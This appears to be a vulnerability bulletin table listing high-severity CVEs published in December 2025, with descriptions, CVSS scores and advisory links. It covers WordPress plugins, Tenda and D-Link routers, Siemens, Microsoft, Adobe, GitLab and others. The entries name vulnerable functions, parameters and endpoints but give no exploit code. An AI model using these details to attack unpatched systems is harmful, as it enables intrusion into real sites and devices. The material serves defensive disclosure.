| rodgerholl--Visitor Logic Lite | The Visitor Logic Lite plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0.3 via deserialization of untrusted input from the `lpblocks` cookie. This is due to the `lp_track()` function passing unsanitized cookie data directly to the `unserialize()` function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code granted they can access the WordPress site. | 2025-12-12 | 8.1 | CVE-2025-14044 | https://www.wordfence.com/threat-intel/vulnerabilities/id/60fb6928-96fb-4c1f-989c-cc07965b5266?source=cve https://plugins.trac.wordpress.org/browser/logic-pro/trunk/logic-lite.php#L131 https://plugins.trac.wordpress.org/browser/logic-pro/tags/1.0.3/logic-lite.php#L131 |
| videomerchant--Video Merchant | The Video Merchant plugin for WordPress is vulnerable to Cross-Site Request Forgery in version <= 5.0.4. This is due to missing or incorrect nonce validation on the video_merchant_add_video_file() function. This makes it possible for unauthenticated attackers to upload arbitrary files that make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-10 | 8.8 | CVE-2025-14390 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7cbe39ae-d10b-432f-afab-682948de2521?source=cve https://wordpress.org/plugins/video-merchant |
| franciscopalacios--Postem Ipsum | The Postem Ipsum plugin for WordPress is vulnerable to unauthorized modification of data leading to Privilege Escalation due to a missing capability check on the postem_ipsum_generate_users() function in all versions up to, and including, 3.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary user accounts with the administrator role. | 2025-12-13 | 8.8 | CVE-2025-14397 | https://www.wordfence.com/threat-intel/vulnerabilities/id/229c146d-3f99-4f63-9a6f-997075846815?source=cve https://plugins.trac.wordpress.org/browser/postem-ipsum/trunk/admin/postem-ipsum-admin.php#L1150 |
| nenad-obradovic--Extensive VC Addons for WPBakery page builder | The Extensive VC Addons for WPBakery page builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.9.1 via the `extensive_vc_get_module_template_part` function. This is due to insufficient path normalization and validation of the user-supplied `shortcode_name` parameter in the `extensive_vc_init_shortcode_pagination` AJAX action. This makes it possible for unauthenticated attackers to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files via the `shortcode_name` parameter. | 2025-12-13 | 8.1 | CVE-2025-14475 | https://www.wordfence.com/threat-intel/vulnerabilities/id/49711408-5d04-4fdd-a6c4-b224959ba1bc?source=cve https://plugins.trac.wordpress.org/browser/extensive-vc-addon/trunk/lib/helpers-functions.php#L78 https://plugins.trac.wordpress.org/browser/extensive-vc-addon/tags/1.9.1/lib/helpers-functions.php#L78 https://plugins.trac.wordpress.org/browser/extensive-vc-addon/trunk/shortcodes/shortcodes-functions.php#L122 https://plugins.trac.wordpress.org/browser/extensive-vc-addon/tags/1.9.1/shortcodes/shortcodes-functions.php#L122 https://plugins.trac.wordpress.org/browser/extensive-vc-addon/trunk/shortcodes/shortcodes-functions.php#L142 https://plugins.trac.wordpress.org/browser/extensive-vc-addon/tags/1.9.1/shortcodes/shortcodes-functions.php#L142 |
| unitecms--Doubly Cross Domain Copy Paste for WordPress | The Doubly - Cross Domain Copy Paste for WordPress plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0.46 via deserialization of untrusted input from the content.txt file within uploaded ZIP archives. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject a PHP Object. The additional presence of a POP chain allows attackers to execute arbitrary code, delete files, retrieve sensitive data, or perform other actions depending on the available gadgets. This is only exploitable by subscribers, when administrators have explicitly enabled that access. | 2025-12-13 | 8.8 | CVE-2025-14476 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4b2c3987-fe7e-426d-8398-acdd6fa3a3dd?source=cve https://plugins.trac.wordpress.org/browser/doubly/trunk/inc_php/functions.class.php#L1040 https://plugins.trac.wordpress.org/browser/doubly/tags/1.0.46/inc_php/functions.class.php#L1040 https://plugins.trac.wordpress.org/browser/doubly/trunk/inc_php/importer.class.php#L2536 https://plugins.trac.wordpress.org/browser/doubly/tags/1.0.46/inc_php/importer.class.php#L2536 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw in libsoup's HTTP header handling allows multiple Host: headers in a request and returns the last occurrence for server-side processing. Common front proxies often honor the first Host: header, so this mismatch can cause vhost confusion where a proxy routes a request to one backend but the backend interprets it as destined for another host. This discrepancy enables request-smuggling style attacks, cache poisoning, or bypassing host-based access controls when an attacker supplies duplicate Host headers. | 2025-12-11 | 8.2 | CVE-2025-14523 | https://access.redhat.com/security/cve/CVE-2025-14523 RHBZ#2421349 |
| Tenda--CH22 | A security flaw has been discovered in Tenda CH22 1.0.0.1. This affects the function frmL7ImForm of the file /goform/L7Im. Performing manipulation of the argument page results in buffer overflow. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. | 2025-12-11 | 8.8 | CVE-2025-14526 | VDB-335866 | Tenda CH22 L7Im frmL7ImForm buffer overflow VDB-335866 | CTI Indicators (IOB, IOC, IOA) Submit #703035 | Tenda CH22 V1.0.0.1 Buffer overflow vulnerability https://github.com/maximdevere/CVE2/issues/5 https://github.com/maximdevere/CVE2/issues/5#issue-3673676260 https://www.tenda.com.cn/ |
| UTT--Jinqi 512W | A vulnerability was found in UTT Jinqi (进取) 512W up to 1.7.7-171114. It affects an unknown part of the file /goform/formWebAuthGlobalConfig. Manipulating the argument hidcontact results in memory corruption. The attack can be launched remotely, and a public exploit is available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-12 | 8.8 | CVE-2025-14572 | VDB-336196 \| UTT 进取 512W formWebAuthGlobalConfig memory corruption VDB-336196 \| CTI Indicators (IOB, IOC, IOA) Submit #704107 \| UTT (AiTai) Jinqi 512W <=v3v1.7.7-171114 Buffer Overflow https://github.com/alc9700jmo/CVE/issues/21 |
| Tenda--AC20 | A vulnerability was identified in Tenda AC20 16.03.08.12. The affected element is the function formSetPPTPUserList of the file /goform/setPptpUserList of the component httpd. Manipulating the argument list leads to a stack-based buffer overflow. The attack can be executed remotely, and a public exploit is available. | 2025-12-14 | 8.8 | CVE-2025-14654 | VDB-336387 \| Tenda AC20 httpd setPptpUserList formSetPPTPUserList stack-based overflow VDB-336387 \| CTI Indicators (IOB, IOC, IOA) Submit #712899 \| Tenda AC20 V16.03.08.12 Buffer Overflow https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN12/AC20_SetPptpUserList.md https://www.tenda.com.cn/ |
| Tenda--AC20 | A security flaw has been discovered in Tenda AC20 16.03.08.12. The impacted element is the function formSetRebootTimer of the file /goform/SetSysAutoRebbotCfg of the component httpd. Manipulating the argument rebootTime results in a stack-based buffer overflow. The attack can be carried out remotely, and a public exploit is available. | 2025-12-14 | 8.8 | CVE-2025-14655 | VDB-336388 \| Tenda AC20 httpd SetSysAutoRebbotCfg formSetRebootTimer stack-based overflow VDB-336388 \| CTI Indicators (IOB, IOC, IOA) Submit #712910 \| Tenda AC20 V16.03.08.12 Buffer Overflow https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN13/AC20_SetSysAutoRebbotCfg.md https://www.tenda.com.cn/ |
| Tenda--AC20 | A weakness has been identified in Tenda AC20 16.03.08.12. It affects the function httpd of the file /goform/openSchedWifi. Manipulating the arguments schedStartTime/schedEndTime can lead to a buffer overflow. The attack can be performed remotely, and a public exploit is available. | 2025-12-14 | 8.8 | CVE-2025-14656 | VDB-336389 \| Tenda AC20 openSchedWifi httpd buffer overflow VDB-336389 \| CTI Indicators (IOB, IOC, IOA) Submit #712917 \| Tenda AC20 V16.03.08.12 Buffer Overflow https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN14/AC20_openSchedWifi.md https://www.tenda.com.cn/ |
| D-Link--DIR-860LB1 | A vulnerability was detected in D-Link DIR-860LB1 and DIR-868LB1 203b01/203b03. Affected is an unknown function of the component DHCP Daemon. Manipulating the argument Hostname results in command injection. The attack can be launched remotely, and a public exploit is available. | 2025-12-14 | 8.8 | CVE-2025-14659 | VDB-336391 \| D-Link DIR-860LB1/DIR-868LB1 DHCP command injection VDB-336391 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #713701 \| D-Link DIR-860LB1 v203b03 Command Injection Submit #714709 \| D-Link DIR-868LB1 v203b01 Command Injection (Duplicate) https://tzh00203.notion.site/D-Link-DIR-860LB1-v203b03-Command-Injection-in-DHCPd-2c6b5c52018a807eab1ae73dbd95eee3?source=copy_link https://tzh00203.notion.site/D-Link-DIR-868LB1-v203b01-Command-Injection-in-DHCPd-2c8b5c52018a805296c3dea51a7a4070?source=copy_link https://www.dlink.com/ |
| Infinera--MTC-9 | Server-Side Request Forgery (SSRF) vulnerability in Infinera MTC-9 allows remote unauthenticated users to reach other network resources via HTTPS requests, using the appliance as a bridge. | 2025-12-08 | 8.6 | CVE-2025-26487 | https://www.cvcn.gov.it/cvcn/cve/CVE-2025-26487 |
| NVIDIA--Merlin Transformers4Rec | NVIDIA Merlin Transformers4Rec for Linux contains a vulnerability in the Trainer component, where a user could cause a deserialization issue. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering. | 2025-12-09 | 8.8 | CVE-2025-33213 | https://nvd.nist.gov/vuln/detail/CVE-2025-33213 https://www.cve.org/CVERecord?id=CVE-2025-33213 https://nvidia.custhelp.com/app/answers/detail/a_id/5739 |
| NVIDIA--NVTabular | NVIDIA NVTabular for Linux contains a vulnerability in the Workflow component, where a user could cause a deserialization issue. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering. | 2025-12-09 | 8.8 | CVE-2025-33214 | https://nvd.nist.gov/vuln/detail/CVE-2025-33214 https://www.cve.org/CVERecord?id=CVE-2025-33214 https://nvidia.custhelp.com/app/answers/detail/a_id/5739 |
| Siemens--COMOS V10.6 | A vulnerability has been identified in COMOS V10.6 (All versions), JT Bi-Directional Translator for STEP (All versions), NX V2412 (All versions < V2412.8900 with Cloud Entitlement (bundled as NX X)), NX V2506 (All versions < V2506.6000 with Cloud Entitlement (bundled as NX X)), Simcenter 3D (All versions < V2506.6000 with Cloud Entitlement (bundled as Simcenter X Mechanical)), Simcenter Femap (All versions < V2506.0002 with Cloud Entitlement (bundled as Simcenter X Mechanical)), Simcenter Studio (All versions), Simcenter System Architect (All versions), Tecnomatix Plant Simulation (All versions < V2504.0007). The SALT SDK is missing server certificate validation while establishing TLS connections to the authorization server. This could allow an attacker to perform a man-in-the-middle attack. | 2025-12-09 | 8.1 | CVE-2025-40801 | https://cert-portal.siemens.com/productcert/html/ssa-710408.html https://cert-portal.siemens.com/productcert/html/ssa-212953.html |
| Siemens--SIMATIC CN 4100 | A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected application does not properly validate input parameters in its REST API, resulting in improper handling of unexpected arguments. This could allow an authenticated attacker to execute arbitrary code with limited privileges. | 2025-12-09 | 8.3 | CVE-2025-40937 | https://cert-portal.siemens.com/productcert/html/ssa-416652.html |
| Siemens--SIMATIC CN 4100 | A vulnerability has been identified in SIMATIC CN 4100 (All versions < V4.0.1). The affected device stores sensitive information in the firmware. This could allow an attacker to access and misuse this information, potentially impacting the device's confidentiality, integrity, and availability. | 2025-12-09 | 8.1 | CVE-2025-40938 | https://cert-portal.siemens.com/productcert/html/ssa-416652.html |
| SAP_SE--SAP Web Dispatcher and Internet Communication Manager (ICM) | SAP Web Dispatcher and ICM may expose internal testing interfaces that are not intended for production. If enabled, unauthenticated attackers could exploit them to access diagnostics, send crafted requests, or disrupt services. This vulnerability has a high impact on the confidentiality and availability of the application and a low impact on its integrity. | 2025-12-09 | 8.2 | CVE-2025-42878 | https://me.sap.com/notes/3684682 https://url.sap/sapsecuritypatchday |
| TeamViewer--DEX | A vulnerability in TeamViewer DEX Client (formerly the 1E client) - Content Distribution Service (NomadBranch.exe) prior to version 25.11 for Windows allows malicious actors to bypass file integrity validation via a crafted request. By providing a valid hash for a malicious file, an attacker can cause the service to incorrectly validate and process the file as trusted, enabling arbitrary code execution under the Nomad Branch service context. | 2025-12-11 | 8.8 | CVE-2025-44016 | https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1005/ |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. A high privileged attacker could exploit this vulnerability by providing maliciously crafted serialized data to the application. Exploitation of this issue requires user interaction and scope is changed. | 2025-12-09 | 8.4 | CVE-2025-61810 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. A high privileged attacker could leverage this vulnerability to bypass security measures and execute malicious code. Exploitation of this issue does not require user interaction and scope is changed. | 2025-12-09 | 8.4 | CVE-2025-61811 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Input Validation vulnerability that could allow a high privileged attacker to gain arbitrary code execution. Exploitation of this issue does not require user interaction. | 2025-12-09 | 8.4 | CVE-2025-61812 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files on the server. Exploitation of this issue does not require user interaction and scope is changed. | 2025-12-09 | 8.2 | CVE-2025-61813 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Microsoft--Windows 11 Version 25H2 | Heap-based buffer overflow in Windows Resilient File System (ReFS) allows an authorized attacker to execute code over a network. | 2025-12-09 | 8.8 | CVE-2025-62456 | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability |
| Microsoft--Windows 10 Version 1809 | Untrusted pointer dereference in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to execute code over a network. | 2025-12-09 | 8.8 | CVE-2025-62549 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability |
| Microsoft--Azure Monitor | Out-of-bounds write in Azure Monitor Agent allows an authorized attacker to execute code over a network. | 2025-12-09 | 8.8 | CVE-2025-62550 | Azure Monitor Agent Remote Code Execution Vulnerability |
| Microsoft--Microsoft Office LTSC 2024 | Access of resource using incompatible type ('type confusion') in Microsoft Office allows an unauthorized attacker to execute code locally. | 2025-12-09 | 8.4 | CVE-2025-62554 | Microsoft Office Remote Code Execution Vulnerability |
| Microsoft--Microsoft Office LTSC 2024 | Use after free in Microsoft Office allows an unauthorized attacker to execute code locally. | 2025-12-09 | 8.4 | CVE-2025-62557 | Microsoft Office Remote Code Execution Vulnerability |
| Microsoft--GitHub Copilot Plugin for JetBrains IDEs | Improper neutralization of special elements used in a command ('command injection') in Copilot allows an unauthorized attacker to execute code locally. | 2025-12-09 | 8.4 | CVE-2025-64671 | GitHub Copilot for Jetbrains Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Server Subscription Edition | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2025-12-09 | 8.8 | CVE-2025-64672 | Microsoft SharePoint Server Spoofing Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to execute code over a network. | 2025-12-09 | 8.8 | CVE-2025-64678 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability |
| Huawei--HarmonyOS | Input verification vulnerability in the compression and decompression module. Impact: Successful exploitation of this vulnerability may affect app data integrity. | 2025-12-08 | 8.4 | CVE-2025-66324 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| Huawei--HarmonyOS | Multi-thread race condition vulnerability in the network management module. Impact: Successful exploitation of this vulnerability may affect availability. | 2025-12-08 | 8.4 | CVE-2025-66328 | https://consumer.huawei.com/en/support/bulletin/2025/12/ |
| 1Panel-dev--MaxKB | MaxKB is an open-source AI assistant for enterprise. In versions 2.3.1 and below, the tool module allows an attacker to escape the sandbox environment and escalate privileges under certain concurrent conditions. This issue is fixed in version 2.4.0. | 2025-12-11 | 8.8 | CVE-2025-66419 | https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-f9qm-2pxq-fx6c https://github.com/1Panel-dev/MaxKB/commit/f8ada9a110c4dbef8c3c2636c78847ecd621ece7 https://github.com/1Panel-dev/MaxKB/releases/tag/v2.4.0 |
| 1Panel-dev--MaxKB | MaxKB is an open-source AI assistant for enterprise. Versions 2.3.1 and below have improper file permissions which allow attackers to overwrite the built-in dynamic linker and other critical files, potentially resulting in privilege escalation. This issue is fixed in version 2.4.0. | 2025-12-11 | 8.8 | CVE-2025-66446 | https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-5xx2-3q9w-jpgf https://github.com/1Panel-dev/MaxKB/releases/tag/v2.4.0 |
| MasaCMS--MasaCMS | Masa CMS is an open source Enterprise Content Management platform. Versions 7.2.8 and below, 7.3.1 through 7.3.13, 7.4.0-alpha.1 through 7.4.8 and 7.5.0 through 7.5.1 are vulnerable to XSS when an unsanitized value of the ajax URL query parameter is directly included within the `<head>` section of the HTML page. An attacker can execute arbitrary scripts in the context of the user's session, potentially leading to Session Hijacking, Data Theft, Defacement and Malware Distribution. This issue is fixed in versions 7.5.2, 7.4.9, 7.3.14, and 7.2.9. To work around this issue, configure a Web Application Firewall (WAF) rule (e.g., ModSecurity) to block requests containing common XSS payload characters in the ajax query parameter. Alternatively, implement server-side sanitization using middleware to strip or escape dangerous characters from the ajax parameter before it reaches the vulnerable rendering logic. | 2025-12-12 | 8.2 | CVE-2025-66492 | https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-249c-vqwv-43vc https://github.com/MasaCMS/MasaCMS/commit/376c27196b1e2489888b7a000cdf5c45bb85959e |
| argoproj--argo-workflows | Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Versions 3.6.13 and below and versions 3.7.0 through 3.7.4, contain unsafe untar code that handles symbolic links in archives. Concretely, the computation of a link's target and the subsequent check are flawed. An attacker can overwrite the file /var/run/argo/argoexec with a script of their choice, which would be executed at the pod's start. The patch deployed against CVE-2025-62156 is ineffective against malicious archives containing symbolic links. This issue is fixed in versions 3.6.14 and 3.7.5. | 2025-12-09 | 8.1 | CVE-2025-66626 | https://github.com/argoproj/argo-workflows/security/advisories/GHSA-xrqc-7xgx-c9vh https://github.com/argoproj/argo-workflows/commit/6b92af23f35aed4d4de8b04adcaf19d68f006de1 https://github.com/advisories/GHSA-p84v-gxvw-73pf https://github.com/argoproj/argo-workflows/blob/5291e0b01f94ba864f96f795bb500f2cfc5ad799/workflow/executor/executor.go#L1034-L1037 |
| wasmi-labs--wasmi | Wasmi is a WebAssembly interpreter focused on constrained and embedded systems. In versions 0.41.0, 0.41.1, 0.42.0 up to (but not including) 0.47.1, 0.50.0 through 0.51.2 and 1.0.0, Wasmi's linear memory implementation leads to a Use After Free vulnerability, triggered by a WebAssembly module under certain memory growth conditions. This issue potentially leads to memory corruption, information disclosure, or code execution. This issue is fixed in versions 0.41.2, 0.47.1, 0.51.3 and 1.0.1. To work around this issue, consider limiting the maximum linear memory sizes where feasible. | 2025-12-09 | 8.4 | CVE-2025-66627 | https://github.com/wasmi-labs/wasmi/security/advisories/GHSA-g4v2-cjqp-rfmq |
| zitadel--zitadel | ZITADEL is an open-source identity infrastructure tool. Versions 4.0.0-rc.1 through 4.7.0 are vulnerable to DOM-Based XSS through the Zitadel V2 logout endpoint. The /logout endpoint insecurely routes to a value that is supplied in the post_logout_redirect GET parameter. As a result, an unauthenticated remote attacker can execute malicious JS code in Zitadel users' browsers. To carry out an attack, multiple user sessions need to be active in the same browser; account takeover is mitigated when using Multi-Factor Authentication (MFA) or Passwordless authentication. This issue is fixed in version 4.7.1. | 2025-12-09 | 8 | CVE-2025-67495 | https://github.com/zitadel/zitadel/security/advisories/GHSA-v959-qxv6-6f8p https://github.com/zitadel/zitadel/commit/4c879b47334e01d4fcab921ac1b44eda39acdb96 |
| okta--okta-sdk-java | Okta Java Management SDK facilitates interactions with the Okta management API. In versions 11.0.0 through 20.0.0, race conditions may arise from concurrent requests using the ApiClient class. This could cause a status code or response header from one request's response to influence another request's response. This issue is fixed in version 20.0.1. | 2025-12-10 | 8.4 | CVE-2025-67505 | https://github.com/okta/okta-sdk-java/security/advisories/GHSA-j5gq-897m-2rff https://github.com/okta/okta-sdk-java/commit/abf4f128a0441f90cb7efcdcf4bde1aef8703243 |
| filamentphp--filament | Filament is a collection of full-stack components for accelerated Laravel development. Versions 4.0.0 through 4.3.0 contain a flaw in the handling of recovery codes for app-based multi-factor authentication, allowing the same recovery code to be reused indefinitely. This issue does not affect email-based MFA. It also only applies when recovery codes are enabled. This issue is fixed in version 4.3.1. | 2025-12-10 | 8.1 | CVE-2025-67507 | https://github.com/filamentphp/filament/security/advisories/GHSA-pvcv-q3q7-266g https://github.com/filamentphp/filament/commit/87ff60ad9b6e16d4e14ee36a220b8917dd7b0815 |
| neuron-core--neuron-ai | Neuron is a PHP framework for creating and orchestrating AI Agents. Versions 2.8.11 and below use MySQLSelectTool, which is vulnerable to a Read-Only Bypass. MySQLSelectTool is intended to be a read-only SQL tool (e.g., for LLM agent querying); however, validation based on the first keyword (e.g., SELECT) and a forbidden-keyword list does not block file-writing constructs such as INTO OUTFILE / INTO DUMPFILE. As a result, an attacker who can influence the tool input (e.g., via prompt injection through a public agent endpoint) may write arbitrary files to the DB server if the MySQL/MariaDB account has the FILE privilege and the server configuration permits writes to a useful location (e.g., a web-accessible directory). This issue is fixed in version 2.8.12. | 2025-12-10 | 8.2 | CVE-2025-67509 | https://github.com/neuron-core/neuron-ai/security/advisories/GHSA-j8g6-5gqc-mq36 https://github.com/neuron-core/neuron-ai/commit/72735d0ea133266cf2f5d5d195d41e9dd865289a https://github.com/neuron-core/neuron-ai/releases/tag/2.8.12 |
| Webmin--Webmin | squid/cachemgr.cgi in Webmin before 2.600 does not properly quote arguments. This is relevant if Webmin's Squid module and its Cache Manager feature are available, and an untrusted party is able to authenticate to Webmin and has certain Cache Manager permissions (the "cms" security option). | 2025-12-11 | 8.5 | CVE-2025-67738 | https://github.com/webmin/webmin/commit/1a52bf4d72f9da6d79250c66e51f41c6f5b880ee https://github.com/webmin/webmin/compare/2.520...2.600 |
| Flow-Scanner--lightning-flow-scanner | Lightning Flow Scanner provides a CLI plugin, VS Code Extension and GitHub Action for analysis and optimization of Salesforce Flows. Versions 6.10.5 and below allow a maliciously crafted flow metadata file to cause arbitrary JavaScript execution during scanning. The APIVersion rule uses new Function() to evaluate expression strings, enabling an attacker to supply a malicious expression within rule configuration or crafted flow metadata. This could compromise developer machines, CI runners, or editor environments. This issue is fixed in version 6.10.6. | 2025-12-12 | 8.4 | CVE-2025-67750 | https://github.com/Flow-Scanner/lightning-flow-scanner/security/advisories/GHSA-55jh-84jv-8mx8 https://github.com/Flow-Scanner/lightning-flow-scanner/commit/10f64a5eb193d8a777e453b25e910144e4540795 https://github.com/Flow-Scanner/lightning-flow-scanner/releases/tag/core-v6.10.6 |
| NXLog--NXLog Agent | NXLog Agent before 6.11 can load a file specified by the OPENSSL_CONF environment variable. | 2025-12-14 | 8.1 | CVE-2025-67900 | https://docs.nxlog.co/agent/current/release-notes.html#nxlog-agent-6-11 |
| N/A--Vuetify | The Preset configuration feature of Vuetify (https://v2.vuetifyjs.com/en/features/presets) is vulnerable to Prototype Pollution (https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html) due to the internal 'mergeDeep' utility function used to merge options with defaults. A specially crafted, malicious preset can pollute all JavaScript objects with arbitrary properties, which can further affect every aspect of the application's behavior. This can lead to a wide range of security issues, including resource exhaustion/denial of service or unauthorized access to data. If the application uses Server-Side Rendering (SSR), this vulnerability could affect the whole server process. This issue affects Vuetify versions greater than or equal to 2.2.0-beta.2 and less than 3.0.0-alpha.10. Note: Version 2.x of Vuetify is End-of-Life and will not receive any updates to address this issue. For more information see https://v2.vuetifyjs.com/en/about/eol/ . | 2025-12-12 | 8.6 | CVE-2025-8083 | https://www.herodevs.com/vulnerability-directory/cve-2025-8083 https://codepen.io/herodevs/pen/RNWoaQM/f1f4ccc7e6a307c2a8c36d948ba14755 |
| GitLab--GitLab | GitLab has remediated a security issue in GitLab CE/EE affecting all versions from 17.1 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to perform unauthorized actions on behalf of other users by injecting malicious HTML into vulnerability code flow displays. | 2025-12-11 | 8.7 | CVE-2025-8405 | GitLab Issue #558214 HackerOne Bug Bounty Report #3270940 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| Siemens--RUGGEDCOM ROX II family | A vulnerability has been identified in RUGGEDCOM ROX II family (All versions < V2.17.0). During the Dynamic DNS configuration of the affected product it is possible to inject additional configuration parameters. Under certain circumstances, an attacker could leverage this vulnerability to spawn a reverse shell and gain root access on the affected system. | 2025-12-09 | 7.5 | CVE-2024-56836 | https://cert-portal.siemens.com/productcert/html/ssa-912274.html |
| Siemens--RUGGEDCOM ROX II family | A vulnerability has been identified in RUGGEDCOM ROX II family (All versions < V2.17.0). Due to the insufficient validation during the installation and load of certain configuration files of the affected device, an attacker could spawn a reverse shell and gain root access on the affected system. | 2025-12-09 | 7.2 | CVE-2024-56837 | https://cert-portal.siemens.com/productcert/html/ssa-912274.html |
| Siemens--RUGGEDCOM ROX II family | A vulnerability has been identified in RUGGEDCOM ROX II family (All versions < V2.17.0). The SCEP client available in the affected device for secure certificate enrollment lacks validation of multiple fields. An attacker could leverage this scenario to execute arbitrary code as root user. | 2025-12-09 | 7.2 | CVE-2024-56838 | https://cert-portal.siemens.com/productcert/html/ssa-912274.html |
| Siemens--RUGGEDCOM ROX II family | A vulnerability has been identified in RUGGEDCOM ROX II family (All versions < V2.17.0). Code injection can be achieved when the affected device is using VRF (Virtual Routing and Forwarding). An attacker could leverage this scenario to execute arbitrary code as root user. | 2025-12-09 | 7.2 | CVE-2024-56839 | https://cert-portal.siemens.com/productcert/html/ssa-912274.html |
| Siemens--RUGGEDCOM ROX II family | A vulnerability has been identified in RUGGEDCOM ROX II family (All versions < V2.17.0). Under certain conditions, IPsec may allow code injection in the affected device. An attacker could leverage this scenario to execute arbitrary code as root user. | 2025-12-09 | 7.2 | CVE-2024-56840 | https://cert-portal.siemens.com/productcert/html/ssa-912274.html |
| SPA-Cart--SPA-CART CMS | SPA-CART CMS 1.9.0.3 contains a stored cross-site scripting vulnerability in the product description parameter that allows authenticated administrators to inject malicious scripts. Attackers can submit JavaScript payloads through the 'descr' parameter in the product edit form to execute arbitrary code in administrative users' browsers. | 2025-12-11 | 7.5 | CVE-2024-58304 | ExploitDB-51919 VulnCheck Advisory: SPA-CART CMS 1.9.0.3 Stored Cross-Site Scripting via Product Description |
| PuneethReddyHC--online-shopping-system-advanced | Online Shopping System Advanced 1.0 contains a SQL injection vulnerability in the payment_success.php script that allows attackers to inject malicious SQL through the unfiltered 'cm' parameter. Attackers can exploit the vulnerability by sending crafted SQL queries to retrieve sensitive database information by manipulating the user ID parameter. | 2025-12-12 | 7.5 | CVE-2024-58316 | ExploitDB-51811 Product GitHub Repository VulnCheck Advisory: Online Shopping System Advanced 1.0 SQL Injection via Payment Success Parameter |
| NomySoft Information Technology Training and Consulting Inc.--Nomysem | Incorrect Use of Privileged APIs vulnerability in NomySoft Information Technology Training and Consulting Inc. Nomysem allows Privilege Escalation. This issue affects Nomysem: through May 2025. | 2025-12-10 | 7.1 | CVE-2025-1161 | https://www.usom.gov.tr/bildirim/tr-25-0440 |
| Lenovo--App Store | A DLL hijacking vulnerability was reported in the Lenovo App Store and Lenovo Browser applications that could allow a local authenticated user to execute code with elevated privileges under certain conditions. | 2025-12-10 | 7.8 | CVE-2025-12046 | https://iknow.lenovo.com.cn/detail/435004 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 11.10 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an unauthenticated user to create a denial of service condition by sending crafted GraphQL queries that bypass query complexity limits. | 2025-12-11 | 7.5 | CVE-2025-12562 | GitLab Issue #579152 HackerOne Bug Bounty Report #3360710 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| radykal--Fancy Product Designer | The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 6.4.8 due to insufficient input sanitization and output escaping in the data-to-image.php and pdf-to-image.php files. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2025-12-12 | 7.2 | CVE-2025-12570 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2db4eb1d-3a82-4f0f-b4ff-a291b0289b7f?source=cve https://codecanyon.net/item/fancy-product-designer-woocommercewordpress/6318393 |
